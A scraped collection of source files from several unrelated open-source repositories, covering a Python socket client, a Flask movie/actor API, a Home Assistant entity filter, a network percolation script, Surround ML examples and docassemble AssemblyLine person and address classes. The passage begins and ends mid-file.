print(f'Main function: a = [{a.x}, {a.y!r}] | b = [{b.x}, {b.y!r}] | b = [{c.x}, {c.y!r}]')
print('2 ----------------')
m1cinst = module111.m1c()
print(module111.__doc__)
print('-')
print(m1cinst.__doc__)
print('-')
print(dir(m1cinst))
print('3 ----------------')
print(module222.__doc__) #only possible importing all module ('from module222.m222func import m2func' didn't help): 'import module222'
print('-')
print(m2func.__doc__)
print('-')
m2func()
if __name__ == "__main__":
print(f'The name of module two is {__name__}')
main()
```
#### File: pythonStudy/module222/m222func.py
```python
def m2func():
"function m2func() documentation"
print("inside m2func")
```
#### File: pythonStudy/pyTCPClientServer/cli_envelop_thread_after_accept.py
```python
import socket
HEADER = 64
PORT = 5050
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
#SERVER = "192.168.1.26"
SERVER = "127.0.1.1"
ADDR = (SERVER, PORT)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(ADDR)
def send(msg):
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
client.send(send_length)
client.send(message)
print(client.recv(2048).decode(FORMAT))
send("Hello World!")
input()
send("Hello Everyone!")
input()
send("Hello Tim!")
send(DISCONNECT_MESSAGE)
``` |
{
"source": "a2gs/remoteApp",
"score": 3
} |
#### File: remoteApp/client/remoteAppClientCfg.py
```python
import configparser
class racCfg():
cfgs = None
cfgFile = ''
def __init__(self, fileCfg : str):
self.cfgFile = fileCfg
self.cfgs = configparser.ConfigParser()
self.load()
def get(self, section : str, key : str) -> [bool, None]:
try:
value = self.cfgs[section][key]
except:
return [False, None]
return [True, value]
def set(self, section : str, key : str, value):
try:
self.cfgs.add_section(section)
except configparser.DuplicateSectionError:
pass
self.cfgs.set(section, key, value)
def save(self):
with open(self.cfgFile, 'w') as c:
self.cfgs.write(c)
def load(self):
self.cfgs.read(self.cfgFile)
``` |
{
"source": "a2hsh/udacity-fsnd-capstone",
"score": 3
} |
#### File: app/database/models.py
```python
from app import db
'''
Actors
Should have unique names
should have age and gender
'''
class Actor(db.Model):
__tablename__ = 'actors'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.String(50), unique=True, nullable=False)
age = db.Column(db.Integer(), nullable=False)
gender = db.Column(db.String(6), nullable=False)
movies = db.relationship('Movie', secondary='actor_movies', backref='actors',
lazy=True)
'''
insert()
inserts a new model into the database
the model must have a unique name
the model must have a unique id or null id
EXAMPLE
actor = Actor(name=req_name, age=req_age, gender=req_gender)
actor.insert()
'''
def insert(self):
db.session.add(self)
db.session.commit()
'''
delete()
deletes a model from the database
the model must exist in the database
EXAMPLE
actor = Actor.query.filter(Actor.id == id).one_or_none()
actor.delete()
'''
def delete(self):
db.session.delete(self)
db.session.commit()
'''
update()
updates a model in the database
the model must exist in the database
EXAMPLE
actor = Actor.query.filter(Actor.id == id).one_or_none()
actor.name = '<NAME>'
actor.update()
'''
def update(self):
db.session.commit()
'''
format()
returns a json representation of the actor model
'''
def format(self):
return {
'id': self.id,
'name': self.name,
'age': self.age,
'gender': self.gender,
'movies': [{'id': movie.id, 'title': movie.title} for movie in self.movies]
}
class Movie(db.Model):
__tablename__ = 'movies'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(100), unique=True, nullable=False)
release_date = db.Column(db.String(50), nullable=False)
'''
insert()
inserts a new model into the database
the model must have a unique title
the model must have a unique id or null id
EXAMPLE
movie = Movie(title=req_title)
movie.insert()
'''
def insert(self):
db.session.add(self)
db.session.commit()
'''
delete()
deletes a model from the database
the model must exist in the database
EXAMPLE
movie = Movie.query.filter(Movie.id == id).one_or_none()
movie.delete()
'''
def delete(self):
db.session.delete(self)
db.session.commit()
'''
update()
updates a model in the database
the model must exist in the database
EXAMPLE
movie = Movie.query.filter(Movie.id == id).one_or_none()
movie.title = 'Sully'
movie.update()
'''
def update(self):
db.session.commit()
'''
format()
returns a json representation of the movie model
'''
def format(self):
return {
'id': self.id,
'title': self.title,
'release_date': self.release_date,
'actors': [{'id': actor.id, 'name': actor.name} for actor in self.actors]
}
class ActorMovies(db.Model):
__tablename__ = 'actor_movies'
actor_id = db.Column(db.Integer, db.ForeignKey(
'actors.id', ondelete='CASCADE'), primary_key=True)
movie_id = db.Column(db.Integer, db.ForeignKey(
'movies.id', ondelete='CASCADE'), primary_key=True)
```
#### File: udacity-fsnd-capstone/app/__init__.py
```python
import os
from flask import Flask, jsonify, redirect, request, render_template
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from os import environ
# Instantiating global objects and variables
db = SQLAlchemy()
migrate = Migrate()
def create_app(config=environ.get('FLASK_CONFIG') or 'development'):
# create and configure the app
app = Flask(__name__)
if config == 'development':
app.config.from_object('config.DevConfig')
elif config == 'production':
app.config.from_object('config.ProdConfig')
elif config == 'testing':
app.config.from_object('config.TestConfig')
else:
raise EnvironmentError(
'Please specify a valid configuration profile in your FLASK_CONFIG environment variable for the application. Possible choices are `development`, `testing`, or `production`')
# initializing application extentions
db.init_app(app)
migrate.init_app(app, db)
# bind all extentions to the app instance
with app.app_context():
# importing routes blueprint
from .main import main
# register blueprints
app.register_blueprint(main)
# Public ROUTES
'''
endpoint
GET /
a public endpoint
use this endpoint from a browser to login to your account and get an access token for the API
'''
@app.route('/')
def redirect_to_login():
# redirect to Auth0 login page
return redirect(f'https://{environ.get("AUTH0_DOMAIN")}/authorize?audience={environ.get("AUTH0_AUDIENCE")}&response_type=token&client_id={environ.get("AUTH0_CLIENT_ID")}&redirect_uri={environ.get("AUTH0_REDIRECT_URI")}')
@app.route('/token', methods=['GET'])
def parce_token():
if 'access_token' in request.args:
return request.args.get('access_token')
else:
return render_template('token.html')
# force json errors for all endpoints
from werkzeug.exceptions import HTTPException
@app.errorhandler(Exception)
def other_errors_handler(error):
return jsonify({
'success': False,
'code': error.code,
'message': error.name
}), error.code
return app
```
#### File: app/main/errors.py
```python
from . import main
from ..auth.auth import AuthError
from flask import abort, jsonify
from werkzeug.exceptions import HTTPException
# error handlers
'''
error handler for authorization errors
'''
@main.errorhandler(AuthError)
def authorization_error(error):
return jsonify({
'success': False,
'code': error.status_code,
'message': error.error
}), error.status_code
'''
error handler for internal server errors
'''
@main.errorhandler(500)
def internal_server_error(error):
return jsonify({
'success': False,
'code': 500,
'message': 'internal server error'
}), 500
'''
error handler for all other errors
'''
```
#### File: app/main/__init__.py
```python
from flask import Blueprint, jsonify, request, redirect, render_template
from flask_cors import CORS
from os import environ
# initializing the blueprint
main = Blueprint('main', __name__)
CORS(main, resources={r'*': {'origins': '*'}})
@main.after_request
def after_request(response):
'''defining extra headers'''
response.headers.add('Access-Control-Allow-Headers',
'Content-Type,Authorization,true')
response.headers.add('Access-Control-Allow-Methods',
'GET,PATCH,POST,DELETE,OPTIONS')
response.headers.add('Content-Type', 'application/json')
return response
# importing routes
from . import actors, movies, errors
``` |
{
"source": "a2htray/sudoku-cli",
"score": 2
} |
#### File: src/commands/cmd_generate.py
```python
import click
from src.cli import pass_context
from src.abs.game import Game
@click.command('generate', short_help='Show a view of 9*9 sudoku map')
@click.option('--coordinate/--no-coordinate', default=True)
@click.option('--check/--no-check', default=True)
@click.option('--mode', type=click.Choice(['easy', 'medium', 'hard', 'extreme']), default='medium')
@pass_context
def cli(ctx, coordinate, check, mode):
game = Game(
with_coordinate=coordinate, step_check=check, mode=mode,
random=6, mutiple=18, lmutiple=8)
game.fill_random()
game.flush()
game.gloop()
``` |
{
"source": "a2i2/hassio-to-pubsub",
"score": 2
} |
#### File: src/hassio-to-pubsub/entityfilter.py
```python
import fnmatch
import re
from typing import Callable
CONF_INCLUDE_DOMAINS = "include_domains"
CONF_INCLUDE_ENTITY_GLOBS = "include_entity_globs"
CONF_INCLUDE_ENTITIES = "include_entities"
CONF_EXCLUDE_DOMAINS = "exclude_domains"
CONF_EXCLUDE_ENTITY_GLOBS = "exclude_entity_globs"
CONF_EXCLUDE_ENTITIES = "exclude_entities"
CONF_ENTITY_GLOBS = "entity_globs"
def split_entity_id(entity_id):
"""Split a state entity ID into domain and object ID."""
return entity_id.split(".", 1)
def convert_filter(config):
"""Convert the filter schema into a filter."""
filt = generate_filter(
config[CONF_INCLUDE_DOMAINS],
config[CONF_INCLUDE_ENTITIES],
config[CONF_EXCLUDE_DOMAINS],
config[CONF_EXCLUDE_ENTITIES],
config[CONF_INCLUDE_ENTITY_GLOBS],
config[CONF_EXCLUDE_ENTITY_GLOBS],
)
setattr(filt, "config", config)
setattr(filt, "empty_filter", sum(len(val) for val in config.values()) == 0)
return filt
def _glob_to_re(glob):
"""Translate and compile glob string into pattern."""
return re.compile(fnmatch.translate(glob))
def _test_against_patterns(patterns, entity_id):
"""Test entity against list of patterns, true if any match."""
for pattern in patterns:
if pattern.match(entity_id):
return True
return False
# It's safe since we don't modify it. And None causes typing warnings
# pylint: disable=dangerous-default-value
def generate_filter(
include_domains,
include_entities,
exclude_domains,
exclude_entities,
include_entity_globs = [],
exclude_entity_globs = [],
):
"""Return a function that will filter entities based on the args."""
include_d = set(include_domains)
include_e = set(include_entities)
exclude_d = set(exclude_domains)
exclude_e = set(exclude_entities)
include_eg_set = set(include_entity_globs)
exclude_eg_set = set(exclude_entity_globs)
include_eg = list(map(_glob_to_re, include_eg_set))
exclude_eg = list(map(_glob_to_re, exclude_eg_set))
have_exclude = bool(exclude_e or exclude_d or exclude_eg)
have_include = bool(include_e or include_d or include_eg)
def entity_included(domain, entity_id):
"""Return true if entity matches inclusion filters."""
return (
entity_id in include_e
or domain in include_d
or bool(include_eg and _test_against_patterns(include_eg, entity_id))
)
def entity_excluded(domain, entity_id):
"""Return true if entity matches exclusion filters."""
return (
entity_id in exclude_e
or domain in exclude_d
or bool(exclude_eg and _test_against_patterns(exclude_eg, entity_id))
)
# Case 1 - no includes or excludes - pass all entities
if not have_include and not have_exclude:
return lambda entity_id: True
# Case 2 - includes, no excludes - only include specified entities
if have_include and not have_exclude:
def entity_filter_2(entity_id):
"""Return filter function for case 2."""
domain = split_entity_id(entity_id)[0]
return entity_included(domain, entity_id)
return entity_filter_2
# Case 3 - excludes, no includes - only exclude specified entities
if not have_include and have_exclude:
def entity_filter_3(entity_id):
"""Return filter function for case 3."""
domain = split_entity_id(entity_id)[0]
return not entity_excluded(domain, entity_id)
return entity_filter_3
# Case 4 - both includes and excludes specified
# Case 4a - include domain or glob specified
# - if domain is included, pass if entity not excluded
# - if glob is included, pass if entity and domain not excluded
# - if domain and glob are not included, pass if entity is included
# note: if both include domain matches then exclude domains ignored.
# If glob matches then exclude domains and glob checked
if include_d or include_eg:
def entity_filter_4a(entity_id):
"""Return filter function for case 4a."""
domain = split_entity_id(entity_id)[0]
if domain in include_d:
return not (
entity_id in exclude_e
or bool(
exclude_eg and _test_against_patterns(exclude_eg, entity_id)
)
)
if _test_against_patterns(include_eg, entity_id):
return not entity_excluded(domain, entity_id)
return entity_id in include_e
return entity_filter_4a
# Case 4b - exclude domain or glob specified, include has no domain or glob
# In this one case the traditional include logic is inverted. Even though an
# include is specified since its only a list of entity IDs its used only to
# expose specific entities excluded by domain or glob. Any entities not
# excluded are then presumed included. Logic is as follows
# - if domain or glob is excluded, pass if entity is included
# - if domain is not excluded, pass if entity not excluded by ID
if exclude_d or exclude_eg:
def entity_filter_4b(entity_id):
"""Return filter function for case 4b."""
domain = split_entity_id(entity_id)[0]
if domain in exclude_d or (
exclude_eg and _test_against_patterns(exclude_eg, entity_id)
):
return entity_id in include_e
return entity_id not in exclude_e
return entity_filter_4b
# Case 4c - neither include or exclude domain specified
# - Only pass if entity is included. Ignore entity excludes.
return lambda entity_id: entity_id in include_e
``` |
{
"source": "a2i2/opendigitaltwins-surveillance",
"score": 3
} |
#### File: opendigitaltwins-surveillance/Scripts/percolation.py
```python
import sys
import json
import random
from heapq import heappush, heappop
from statistics import mean
from collections import defaultdict
class Network:
# TODO: Improve efficiency by converting
# string identifiers to ints
def __init__(self, network_json):
self.nodes = network_json["nodes"]
self.edges = network_json["edges"]
# (from, to) -> edge dict
self.edge_index = {}
# from -> [edge]
self.neighbours_index = defaultdict(set)
for e in self.edges:
a = e["from"]
b = e["to"]
# assume at most one edge from a to b
assert (a, b) not in self.edge_index
self.edge_index[(a, b)] = e
self.neighbours_index[a].add(b)
def get_edge(self, a, b):
"""Gets edge, including all attributes"""
return self.edge_index[a, b]
def get_edge_keys(self):
return self.edge_index.keys()
def neighbours(self, a):
"""Gets set of nodes with edge from a"""
return self.neighbours_index[a]
def get_nodes(self):
"""Gets list of nodes"""
return self.nodes
class Perc:
def __init__(self, network, rho, zs, budget):
self.network = network
self.rho = rho
self.zs = zs
self.budget = budget
def q(self, a, b):
e = self.network.get_edge(a, b)
return e["levelAvail"]
def m(self, a, b):
e = self.network.get_edge(a, b)
return e["priv"]
def f(self, a, b):
e = self.network.get_edge(a, b)
return 1 - e["privAvail"]
def z(self, a, b):
return self.zs[(a, b)]
def b_od(self, o, d):
# assume constant budget
return self.budget
def f_od(self, o, d):
# assume equal flow demand between all o,d pairs
return 1
# this is the most important function to define (rest will follow)
def c_ab(self, a, b):
if self.q(a, b) > self.rho and self.z(a, b) < self.f(a, b):
return 0
if self.q(a, b) > self.rho and self.z(a, b) >= self.f(a, b):
return self.m(a, b)
return float("inf")
def c_star_od(self, o, d, budget=float("inf")):
# Apply Dijkstra's algorithm to find minimum cost path from o to d
# TODO: Find more efficient implementation at scale (e.g. could use approximate solution)
if budget <= 0:
return None
# Based on https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm#Using_a_priority_queue
dist = {}
q = []
dist[o] = 0
heappush(q, (0, o))
while q:
dist_u, u = heappop(q)
if u == d:
# We found the target node
return dist_u
if dist[u] < dist_u:
# Have already visited this node before.
# Is a stale entry with a greater tentative distance.
continue
for v in self.network.neighbours(u):
# TODO: cache c_ab
# (computed once per run of Dijkstra's alg)
alt = dist_u + self.c_ab(u, v)
if alt < dist.get(v, budget):
dist[v] = alt
# The old tentative distance (if any) will be left in
# the list, but will be ignored as a stale entry
# during processing loop.
heappush(q, (alt, v))
# Target node not reachable (or has cost >= budget)
return None
def r_od(self, o, d):
# Pass budget to c_star_od to allow terminating search early
return 0 if self.c_star_od(o, d, self.b_od(o, d)) is None else 1
def UD(self):
flow_unaffected = 0
flow_demand = 0
for o in self.network.get_nodes():
for d in self.network.get_nodes():
flow_unaffected += self.f_od(o, d) * self.r_od(o, d)
flow_demand += self.f_od(o, d)
return flow_unaffected / flow_demand
def alpha(network, budget, integral_steps=4, rand_steps=1000):
# Example of integral_steps=4
# 0 0.25 0.5 0.75 1
# V V V V V
# [0.125,0.375,0.625,0.875]
delta = 1/integral_steps
integral = 0
for step in range(integral_steps):
rho = delta * step + delta/2
UD_rho = []
for _ in range(rand_steps):
# Todo: use a seed for repeatability
zs = {
(i, j): random.random()
for (i, j) in network.get_edge_keys()
}
perc = Perc(network, rho, zs, budget)
UD_rho.append(perc.UD())
E_UD_rho = mean(UD_rho)
integral += E_UD_rho * delta
return integral
def percolation(network_json):
network = Network(network_json)
budget = 10 # bits of entropy
a = alpha(network, budget)
results = {
"alpha": a
}
return results
if __name__ == "__main__":
if not len(sys.argv) > 1:
raise("needs network as first argument")
network_file = sys.argv[1]
with open(network_file, 'r') as f:
network_json = json.load(f)
results = percolation(network_json)
print(json.dumps(results, indent=4))
``` |
{
"source": "a2i2/surround",
"score": 2
} |
#### File: examples/hydra_example/dodo.py
```python
import os
import sys
import subprocess
from hydra_example.config import Config
from surround import load_config
CONFIG = load_config(name="config", config_class=Config)
DOIT_CONFIG = {'verbosity':2, 'backend':'sqlite3'}
PACKAGE_PATH = os.path.basename(CONFIG["package_path"])
IMAGE = "%s/%s:%s" % (CONFIG["company"], CONFIG["image"], CONFIG["version"])
IMAGE_JUPYTER = "%s/%s-jupyter:%s" % (CONFIG["company"], CONFIG["image"], CONFIG["version"])
DOCKER_JUPYTER = "Dockerfile.Notebook"
PARAMS = [
{
'name': 'args',
'long': 'args',
'type': str,
'default': ""
}
]
def task_status():
"""Show information about the project such as available runners and assemblers"""
return {
'actions': ["%s -m %s status=1" % (sys.executable, PACKAGE_PATH)]
}
def task_build():
"""Build the Docker image for the current project"""
return {
'actions': ['docker build --tag=%s .' % IMAGE],
'params': PARAMS
}
def task_remove():
"""Remove the Docker image for the current project"""
return {
'actions': ['docker rmi %s %s -f' % (IMAGE, IMAGE_JUPYTER)],
'params': PARAMS
}
def task_dev():
"""Run the main task for the project"""
cmd = [
"docker",
"run",
"--volume",
"\"%s/\":/app" % CONFIG["volume_path"],
"%s" % IMAGE,
"python3 -m %s %s" % (PACKAGE_PATH, "%(args)s")
]
return {
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_interactive():
"""Run the Docker container in interactive mode"""
def run():
cmd = [
'docker',
'run',
'-it',
'--rm',
'-w',
'/app',
'--volume',
'%s/:/app' % CONFIG['volume_path'],
IMAGE,
'bash'
]
process = subprocess.Popen(cmd, encoding='utf-8')
process.wait()
return {
'actions': [run]
}
def task_prod():
"""Run the main task inside a Docker container for use in production """
return {
'actions': ["docker run %s python3 -m %s %s" % (IMAGE, PACKAGE_PATH, "%(args)s")],
'task_dep': ["build"],
'params': PARAMS
}
def task_train():
"""Run training mode inside the container"""
output_path = CONFIG["volume_path"] + "/output"
data_path = CONFIG["volume_path"] + "/input"
cmd = [
"docker run",
"--volume \"%s\":/app/output" % output_path,
"--volume \"%s\":/app/input" % data_path,
IMAGE,
"python3 -m hydra_example mode=train %(args)s"
]
return {
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_batch():
"""Run batch mode inside the container"""
output_path = CONFIG["volume_path"] + "/output"
data_path = CONFIG["volume_path"] + "/input"
cmd = [
"docker run",
"--volume \"%s\":/app/output" % output_path,
"--volume \"%s\":/app/input" % data_path,
IMAGE,
"python3 -m hydra_example mode=batch %(args)s"
]
return {
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_train_local():
"""Run training mode locally"""
cmd = [
sys.executable,
"-m %s" % PACKAGE_PATH,
"mode=train",
"%(args)s"
]
return {
'basename': 'trainLocal',
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_batch_local():
"""Run batch mode locally"""
cmd = [
sys.executable,
"-m %s" % PACKAGE_PATH,
"mode=batch",
"%(args)s"
]
return {
'basename': 'batchLocal',
'actions': [" ".join(cmd)],
'params': PARAMS
}
def task_build_jupyter():
"""Build the Docker image for a Jupyter Lab notebook"""
return {
'basename': 'buildJupyter',
'actions': ['docker build --tag=%s . -f %s' % (IMAGE_JUPYTER, DOCKER_JUPYTER)],
'task_dep': ['build'],
'params': PARAMS
}
def task_jupyter():
"""Run a Jupyter Lab notebook"""
cmd = [
"docker",
"run",
"-itp",
"8888:8888",
'-w',
'/app',
"--volume",
"\"%s/\":/app" % CONFIG["volume_path"],
IMAGE_JUPYTER
]
return {
'actions': [" ".join(cmd)],
}
```
#### File: hydra_example/hydra_example/__main__.py
```python
import os
import hydra
from surround import Surround, Assembler
from .config import Config
from .stages import Baseline, InputValidator
from .file_system_runner import FileSystemRunner
RUNNERS = [
FileSystemRunner()
]
ASSEMBLIES = [
Assembler("baseline")
.set_stages([InputValidator(), Baseline()])
]
@hydra.main(config_name="config")
def main(config: Config) -> None:
surround = Surround(
RUNNERS,
ASSEMBLIES,
config,
"hydra_example",
"Example showing the use of the Hydra framework.",
os.path.dirname(os.path.dirname(__file__))
)
if config.status:
surround.show_info()
else:
surround.run(config.runner, config.assembler, config.mode)
if __name__ == "__main__":
main(None)
```
#### File: surround/surround/stage.py
```python
from abc import ABC, abstractmethod
class Stage(ABC):
"""
Base class of all stages in a Surround pipeline.
See the following class for more information:
- :class:`surround.stage.Estimator`
"""
def dump_output(self, state, config):
"""
Dump the output of the stage after the stage has transformed the data.
.. note:: This is called by :meth:`surround.assembler.Assembler.run` (when dumping output is requested).
:param state: Stores intermediate data from each stage in the pipeline
:type state: Instance or child of the :class:`surround.State` class
:param config: Config of the pipeline
:type config: :class:`surround.config.BaseConfig`
"""
def operate(self, state, config):
"""
Main function to be called in an assembly.
:param state: Contains all pipeline state including input and output data
:param config: Config for the assembly
"""
def initialise(self, config):
"""
Initialise the stage, this may be loading a model or loading data.
.. note:: This is called by :meth:`surround.assembler.Assembler.init_assembler`.
:param config: Contains the settings for each stage
:type config: :class:`surround.config.BaseConfig`
"""
class Estimator(Stage):
"""
Base class for an estimator in a Surround pipeline. Responsible for performing estimation
or training using the input data.
This stage is executed by :meth:`surround.assembler.Assembler.run`.
Example::
class Predict(Estimator):
def initialise(self, config):
self.model = load_model(os.path.join(config["models_path"], "model.pb"))
def estimate(self, state, config):
state.output_data = run_model(self.model)
def fit(self, state, config):
state.output_data = train_model(self.model)
"""
@abstractmethod
def estimate(self, state, config):
"""
Process input data and store estimated values.
.. note:: This method is ONLY called by :meth:`surround.assembler.Assembler.run` when
running in predict/batch-predict mode.
:param state: Stores intermediate data from each stage in the pipeline
:type state: Instance or child of the :class:`surround.State` class
:param config: Contains the settings for each stage
:type config: :class:`surround.config.BaseConfig`
"""
def fit(self, state, config):
"""
Train a model using the input data.
.. note:: This method is ONLY called by :meth:`surround.assembler.Assembler.run` when
running in training mode.
:param state: Stores intermediate data from each stage in the pipeline
:type state: Instance or child of the :class:`surround.State` class
:param config: Contains the settings for each stage
:type config: :class:`surround.config.BaseConfig`
"""
``` |
{
"source": "a2jut/docassemble-AssemblyLine",
"score": 2
} |
#### File: docassemble/AssemblyLine/al_general.py
```python
from typing import Dict, List, Union
from docassemble.base.util import Address, Individual, DAList, date_difference, name_suffix, states_list, comma_and_list, word, comma_list, url_action, get_config, phone_number_is_valid, validation_error, DAWeb, get_config, as_datetime, DADateTime, subdivision_type
from docassemble.base.functions import DANav
import re
__all__ = ['ALAddress',
'ALAddressList',
'ALPeopleList',
'ALIndividual',
'section_links',
'is_phone_or_email',
'section_links',
'Landlord',
'Tenant',
'HousingAuthority',
'Applicant',
'Abuser',
'Survivor',
'PeopleList',
'VCIndividual',
'AddressList',
'Applicant',
'Abuser',
'Survivor',
'github_modified_date',
'will_send_to_real_court',
'safe_subdivision_type']
##########################################################
# Base classes
def safe_subdivision_type(country_code):
try:
return subdivision_type(country_code)
except:
return None
class ALAddress(Address):
# Future-proofing TODO: this class can be used to help handle international addresses in the future.
# Most likely, ask for international address as just 3 unstructured lines. Key thing is
# the built-in address object requires some fields to be defined that we don't want to require of
# international addresses when you want to render it to text.
def address_fields(self, country_code=None, default_state=None, show_country=False):
fields = [
{"label": str(self.address_label), "address autocomplete": True, "field": self.attr_name('address')},
{"label": str(self.unit_label), "field": self.attr_name('unit'), "required": False},
{"label": str(self.city_label), "field": self.attr_name("city")},
]
if country_code:
fields.append(
{"label": str(self.state_label), "field": self.attr_name("state"), "code": "states_list(country_code='{}')".format(country_code), "default": default_state if default_state else ''}
)
else:
fields.append(
{"label": str(self.state_label), "field": self.attr_name("state"), "default": default_state if default_state else ''}
)
if country_code == "US":
fields.append(
{"label": str(self.zip_label), "field": self.attr_name('zip'), "required": False}
)
else:
fields.append(
# We have code in ALWeaver that relies on "zip", so keep attribute same for now
{"label": str(self.postal_code_label), "field": self.attr_name('zip'), "required": False}
)
if show_country:
fields.append({"label": self.country_label, "field": self.attr_name("address.country"), "required": False, "code": "countries_list()", "default": country_code})
# NOTE: using , "datatype": "combobox" might be nice but does not play together well w/ address autocomplete
return fields
class ALAddressList(DAList):
"""Store a list of Address objects"""
def init(self, *pargs, **kwargs):
super(ALAddressList, self).init(*pargs, **kwargs)
self.object_type = ALAddress
def __str__(self):
return comma_and_list([item.on_one_line() for item in self])
class ALPeopleList(DAList):
"""Used to represent a list of people. E.g., defendants, plaintiffs, children"""
def init(self, *pargs, **kwargs):
super(ALPeopleList, self).init(*pargs, **kwargs)
self.object_type = ALIndividual
def names_and_addresses_on_one_line(self, comma_string:str='; ') -> str:
"""Returns the name of each person followed by their address, separated by a semicolon"""
return comma_and_list([str(person) + ', ' + person.address.on_one_line() for person in self], comma_string=comma_string)
def familiar(self) -> str:
return comma_and_list([person.name.familiar() for person in self])
def familiar_or(self) -> str:
return comma_and_list([person.name.familiar() for person in self],and_string=word("or"))
class ALIndividual(Individual):
"""Used to represent an Individual on the assembly line project.
Two custom attributes are objects and so we need to initialize: `previous_addresses`
and `other_addresses`
"""
previous_addresses: ALAddressList
other_addresses: ALAddressList
mailing_address: ALAddress
def init(self, *pargs, **kwargs):
super(ALIndividual, self).init(*pargs, **kwargs)
# Initialize the attributes that are themselves objects. Requirement to work with Docassemble
# See: https://docassemble.org/docs/objects.html#ownclassattributes
# NOTE: this stops you from passing the address to the constructor
self.reInitializeAttribute('address',ALAddress)
if not hasattr(self, 'previous_addresses'):
self.initializeAttribute('previous_addresses', ALAddressList)
if not hasattr(self, 'other_addresses'):
self.initializeAttribute('other_addresses', ALAddressList)
if not hasattr(self, 'mailing_address'):
self.initializeAttribute('mailing_address',ALAddress)
def signature_if_final(self, i: str):
if i == 'final':
return self.signature
else:
return ''
def phone_numbers(self) -> str:
nums = []
if hasattr(self, 'mobile_number') and self.mobile_number:
nums.append({self.mobile_number: 'cell'})
if hasattr(self, 'phone_number') and self.phone_number:
nums.append({self.phone_number: 'other'})
if len(nums) > 1:
return comma_list([list(num.keys())[0] + ' (' + list(num.values())[0] + ')' for num in nums])
elif len(nums):
return list(nums[0].keys())[0]
else:
return ''
def contact_methods(self)-> str:
"""Method to return a formatted string with all provided contact methods of the individual:
* Phone number(s)
* Email
* other method
Returns:
str: Formatted string
"""
methods = []
if self.phone_numbers():
methods.append({self.phone_numbers(): word("by phone at ")})
if hasattr(self, 'email') and self.email:
methods.append({self.email: word("by email at ")})
if hasattr(self, 'other_contact_method') and self.other_contact_method:
methods.append({self.other_contact_method: "by "})
return comma_and_list([list(method.values())[0] + list(method.keys())[0] for method in methods if len(method)], and_string=word("or"))
def merge_letters(self, new_letters: str):
# TODO: move to 209A package
"""If the Individual has a child_letters attribute, add the new letters to the existing list"""
if hasattr(self, 'child_letters'):
self.child_letters = filter_letters([new_letters, self.child_letters])
else:
self.child_letters = filter_letters(new_letters)
def formatted_age(self) -> str:
dd = date_difference(self.birthdate)
if dd.years >= 2:
return '%d years' % (int(dd.years),)
if dd.weeks > 12:
return '%d months' % (int(dd.years * 12.0),)
if dd.weeks > 2:
return '%d weeks' % (int(dd.weeks),)
return '%d days' % (int(dd.days),)
# This design helps us translate the prompts for common fields just once
def name_fields(self, person_or_business:str = 'person') -> List[Dict[str, str]]:
"""
Return suitable field prompts for a name. If `uses_parts` is None, adds the
proper "show ifs" and uses both the parts and the single entry
"""
if person_or_business == 'person':
return [
{"label": str(self.first_name_label), "field": self.attr_name('name.first')},
{"label": str(self.middle_name_label), "field": self.attr_name('name.middle'), "required": False},
{"label": str(self.last_name_label), "field": self.attr_name("name.last")},
{"label": str(self.suffix_label), "field": self.attr_name("name.suffix"), "choices": name_suffix(), "required": False}
]
elif person_or_business == 'business':
# Note: we don't make use of the name.text field for simplicity
# TODO: this could be reconsidered`, but name.text tends to lead to developer error
return [
{"label": str(self.business_name_label), "field": self.attr_name('name.first')}
]
else:
# Note: the labels are template block objects: if they are keys,
# they should be converted to strings first
show_if_indiv = {"variable": self.attr_name("person_type"), "is": "ALIndividual"}
show_if_business = {"variable": self.attr_name("person_type"), "is": "business"}
return [
{"label": str(self.person_type_label), "field": self.attr_name('person_type'),
"choices": [{str(self.individual_choice_label): "ALIndividual"},
{str(self.business_choice_label): "business"}],
"input type": "radio", "required": True},
# Individual questions
{"label": str(self.first_name_label), "field": self.attr_name('name.first'),
"show if": show_if_indiv},
{"label": str(self.middle_name_label), "field": self.attr_name('name.middle'), "required": False,
"show if": show_if_indiv},
{"label": str(self.last_name_label), "field": self.attr_name("name.last"),
"show if": show_if_indiv},
{"label": str(self.suffix_label), "field": self.attr_name("name.suffix"), "choices": name_suffix(), "required": False,
"show if": show_if_indiv},
# Business names
{"label": str(self.business_name_label), "field": self.attr_name('name.first'),
"show if": show_if_business}
]
def address_fields(self, country_code:str="US", default_state:str=None, show_country:bool=False) -> List[Dict[str, str]]:
"""
Return field prompts for address.
"""
# TODO make this more flexible to work w/ homeless individuals and
# international addresses
return self.address.address_fields(country_code=country_code, default_state=default_state, show_country=show_country)
def gender_fields(self, show_help=False):
"""
Return a standard gender input with "self described" option.
"""
choices = [
{str(self.gender_female_label): 'female'},
{str(self.gender_male_label): 'male'},
{str(self.gender_nonbinary_label): 'nonbinary'},
{str(self.gender_prefer_not_to_say_label): 'prefer-not-to-say'},
{str(self.gender_prefer_self_described_label): 'self-described'},
]
self_described_input = {"label": str(self.gender_self_described_label),
"field": self.attr_name('gender'),
"show if": {"variable": self.attr_name('gender'),
"is": 'self-described'},
}
if show_help:
return [
{"label": str(self.gender_label),
"field": self.attr_name('gender'),
"choices": choices,
"help": str(self.gender_help_text)
},
self_described_input
]
else:
return [
{"label": self.gender_label,
"field": self.attr_name('gender'),
"choices": choices,
},
self_described_input
]
def contact_fields(self):
"""
Return field prompts for other contact info
"""
pass
def section_links(nav: DANav) -> List[str]:
"""Returns a list of clickable navigation links without animation."""
sections = nav.get_sections()
section_link = []
for section in sections:
for key in section:
section_link.append('[' + section[key] + '](' + url_action(key) + ')' )
return section_link
########################################################
# Subject-specific classes
class Landlord(ALIndividual):
pass
class Tenant(ALIndividual):
pass
class HousingAuthority(Landlord):
pass
class Applicant(Tenant):
pass
class Abuser(ALIndividual):
pass
class Survivor(ALIndividual):
pass
########################################################
# Compatibility layer to help with migration
# TODO: consider removing after packages migrated
class VCIndividual(ALIndividual):
pass
class AddressList(ALAddressList):
pass
class PeopleList(ALPeopleList):
